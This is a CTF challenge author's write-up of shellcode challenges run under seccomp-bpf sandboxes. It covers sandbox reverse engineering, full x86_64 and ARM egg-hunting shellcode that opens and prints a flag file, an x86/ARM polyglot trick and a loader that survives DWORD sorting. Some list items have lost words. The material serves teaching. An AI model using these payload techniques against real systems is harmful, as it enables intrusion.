As the author of the “coder” series of challenges (Intel Coder, ARM Coder, Poly Coder, and OCD Coder) in the recent BSidesSF CTF, I wanted to share my perspective on the challenges. I can’t tell if the challenges were uninteresting, too hard, or both, but they were solved by far fewer teams than I had expected. (And than we had rated the challenges for when scoring them.)
The entire series of challenges were based on the premise “give me your shellcode and I’ll run it”, but with some limitations. Rather than forcing players to find and exploit a vulnerability, we wanted to teach players about dealing with restricted environments like sandboxes, unusual architectures, and situations where your shellcode might be manipulated by the process before it runs.
Each challenge requested the length of your shellcode followed by the shellcode
and allowed for ~1k of shellcode (which is more than enough for any reasonable
exploitation effort on these). Shellcode was placed into newly-allocated memory
RWX permissions, with a guard page above and below. A new stack was
allocated similarly, but without the execute bit set.
Each challenge got a
seccomp-bpf sandbox setup, with slight variations in the
limitations of the sandbox to encourage players to look into how the sandbox is
- All challenges allowed
close()for housekeeping purposes.
- Intel Coder allowed
open()(with limited arguments) and
- ARM Coder allowed
write(), all with limited arguments.
- Poly Coder allowed
write(), but the file descriptors were already opened for the player.
- OCD Coder allowed
The shellcode was then executed by a helper function written in assembly. (To swap the stack then execute the shellcode.)
There were a few things that made these challenges harder than they might have otherwise been:
- Stripped binaries
- PIE binaries and ASLR
- Statically linking libseccomp (although I thought I was doing players a favor with this, it does make the binary much larger)
A Seccomp Primer
Seccomp initially was a single system call that limited the calling thread to
use a small subset of syscalls.
seccomp-bpf extended this to use Berkeley
Packet Filters (BPF) to allow for filtering system calls. The system call
number and arguments (from registers) are placed into a structure, and the BPF
is used to filter this structure. The filter can result in allowing or denying
the syscall, and on a denied syscall, an error may be returned, a signal may be
delivered to the calling thread, or the thread may be killed.
Because all of the registers are included in the structure,
for filtering not only based on the system call itself, but on the arguments
passed to the system call. One quirk of this is that it is completely unaware
of the types of the arguments, and only operates on the contents of the
registers used for passing arguments. Consequently, pointer types are compared
by the pointer value and not by the contents pointed to. I actually
hadn’t thought about this before writing this challenge and limiting the values
open(). All of the challenges allowing open limited it to
./flag.txt, so not only could you only open that one file, you could only do
it by using the same pointer that was passed to the library functions that setup
An interesting corollary is that if you limit system call arguments by passing in a pointer value, you probably want it to be a global, and you probably don’t want it to be in writable memory, so that an attacker can’t overwrite the desired string and still pass the same pointer.
Reverse Engineering the Sandbox
There’s a wonderful toolset called
seccomp-tools that provides the
ability to dump the BPF structure from the process as it runs by using
ptrace(). If we run the Intel coder binary under
seccomp-tools, we’ll see
the following structure:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 line CODE JT JF K ================================= 0000: 0x20 0x00 0x00 0x00000004 A = arch 0001: 0x15 0x00 0x11 0xc000003e if (A != ARCH_X86_64) goto 0019 0002: 0x20 0x00 0x00 0x00000000 A = sys_number 0003: 0x35 0x0f 0x00 0x40000000 if (A >= 0x40000000) goto 0019 0004: 0x15 0x0d 0x00 0x00000003 if (A == close) goto 0018 0005: 0x15 0x0c 0x00 0x0000000f if (A == rt_sigreturn) goto 0018 0006: 0x15 0x0b 0x00 0x00000028 if (A == sendfile) goto 0018 0007: 0x15 0x0a 0x00 0x0000003c if (A == exit) goto 0018 0008: 0x15 0x09 0x00 0x000000e7 if (A == exit_group) goto 0018 0009: 0x15 0x00 0x09 0x00000002 if (A != open) goto 0019 0010: 0x20 0x00 0x00 0x00000014 A = args >> 32 0011: 0x15 0x00 0x07 0x00005647 if (A != 0x5647) goto 0019 0012: 0x20 0x00 0x00 0x00000010 A = args 0013: 0x15 0x00 0x05 0x8bd01428 if (A != 0x8bd01428) goto 0019 0014: 0x20 0x00 0x00 0x0000001c A = args >> 32 0015: 0x15 0x00 0x03 0x00000000 if (A != 0x0) goto 0019 0016: 0x20 0x00 0x00 0x00000018 A = args 0017: 0x15 0x00 0x01 0x00000000 if (A != 0x0) goto 0019 0018: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0019: 0x06 0x00 0x00 0x00000000 return KILL
The first two lines check the architecture of the running binary (presumably
because the system call numbers are architecture-dependent). The filter then
loads the system call number to determine the behavior for each syscall. Lines
0004 through 0008 are syscalls that are allowed unconditionally. Line 0009
ensures that anything but the already-allowed syscalls or
open() results in
killing the process.
Lines 0010-0017 check the arguments passed to
open(). Since the BPF can only
compare 32 bits at a time, the 64-bit registers are split in two with shifts.
The first few lines ensure that the filename string (
args) is a pointer
0x56478bd01428. Of course, due to ASLR, you’ll find that this
value varies with each execution of the program, so no hard coding your pointer
values here! Finally, it checks that the second argument (
0x0, which corresponds to
O_RDONLY. (No opening the flag for
seccomp-tools really makes this so much easier than manual reversing would be.
Solving Intel & ARM Coder
The solutions for both Intel Coder and ARM Coder are very similar. First, let’s determine the steps we need to undertake:
- Locate fhe
./flag.txtstring that was used in the seccomp-bpf filter.
- Read the file and send the contents to the player. (
In order to not be a total jerk in these challenges, I ensured that one of the
registers contained a value somewhere in the
.text section of the binary, to
make it somewhat easier to hunt for the
./flag.txt string. (This was actually
always the address of the function that executed the player shellcode.)
Consequently, finding the string should have been trivial using the commonly
known egghunter techniques.
At this point, it’s basically just a straightforward shellcode to
file and send its contents. The entirety of my example solution for Intel Coder
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 BITS 64 ; hunt for string based on rdx hunt: add rdx, 0x4 mov rax, 0x742e67616c662f2e ; ./flag.t cmp rax, [rdx] jne hunt xor rax, rax mov rdi, rdx ; path xor rax, rax mov al, 2 ; rax for SYS_open xor rdx, rdx ; mode xor rsi, rsi ; flags syscall xor rdi, rdi inc rdi ; out_fd mov rsi, rax ; in_fd from open xor rdx, rdx ; offset mov r10, 0xFF ; count mov rax, 40 ; SYS_sendfile syscall xor rax, rax mov al, 60 ; SYS_exit xor rdi, rdi ; code syscall
For ARM coder, the solution is much the same, except using
write() instead of
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 .section .text .global shellcode .arm shellcode: # r0 = my shellcode # r1 = new stack # r2 = some pointer # load ./fl into r3 MOVW r3, #0x2f2e MOVT r3, #0x6c66 # load ag.t into r4 MOVW r4, #0x6761 MOVT r4, #0x742e hunt: LDR r5, [r2, #0x4]! TEQ r5, r3 BNE hunt LDR r5, [r2, #0x4] TEQ r5, r4 BNE hunt # r2 should now have the address of ./flag.txt # SYS_open MOVW r7, #5 MOV r0, r2 MOVW r1, #0 MOVW r2, #0 SWI #0 # SYS_read MOVW r7, #3 MOV r1, sp MOV r2, #0xFF SWI #0 # SYS_write MOVW r7, #4 MOV r2, r0 MOV r1, sp MOVW r0, #1 SWI #0 # SYS_exit MOVW r7, #1 MOVW r0, #0 SWI #0
Poly Coder was actually not very difficult if you had solved both of the above challenges. It required only reading from an already open FD and writing to an already open FD. You did have to search through the FDs to find which were open, but this was easy as any that were not would return -1, so looping until an amount greater than 0 was read/written was all that was required.
To produce shellcode that ran on both architectures, you could use an
instruction that was a jump in one architecture and benign in the other. One
such example is
EB 7F 00 32, which is a
jmp 0x7F in
x86_64, but does some
AND operation on
ARM. Prefixing your shellcode with that, followed by
up to 120 bytes of ARM shellcode, then a few bytes of padding, and the
shellcode at the end would work.
As I recall it, one of the other members of our CTF organizing team joked “we should sort their shellcode before we run it.” While intended as a joke, I took this as a challenge and began work to see if this was solvable. Obviously, the smaller the granularity (e.g., sorting by byte) the more difficult this becomes. I settled on trying to find a solution where it was sorted by 32-bit (DWORD) chunks, and found one with about 2 hours of effort.
Rather than try to write the entire shellcode in something that would sort correctly, I wrote a small loader that was manually tweaked to sort. This loader would then take the following shellcode and extract the lower 3 bytes of each DWORD and concatenate them. In this way, I could force ordering by inserting a one-byte tag at the most significant position of each 3 byte chunk.
It looks something like this:
1 2 3 4 5 6 7 8 9 [tag][3 bytes shellcode] [tag][3 bytes shellcode] [tag][3 bytes shellcode] ... [3 bytes shellcode][3 by tes shellcode][3 bytes s hellcode]
The loader is as simple as this:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 BITS 32 # assumes shellcode @eax mov ecx, 0x24 and eax, eax add eax, ecx mov ebx, eax inc edx loop: mov edx, [eax] nop add eax, 4 nop mov [ebx], edx inc ebx inc ebx nop inc ebx nop nop nop dec ecx nop nop nop jnz loop nop
The large number of nops was necessary to get the loader to sort properly, as
were tricks like using 3
inc ebx instructions instead of
add ebx, 3.
There’s even trash instructions like
inc edx that have no affect on the
output, but serve just to get the shellcode to sort the way I needed. The x86
opcode reference was incredibly useful in
finding bytes with the desired value to make things work.
I have no doubt there are shorter or more efficient solutions, but this got the job done.
We’ll soon be releasing the source code to all of the challenges, so you can see the details of how this was all put together, but I wanted to share my insight into the challenges from the author’s point of view. Hopefully those that did solve it (or tried to solve it) had a good time doing so or learned something new.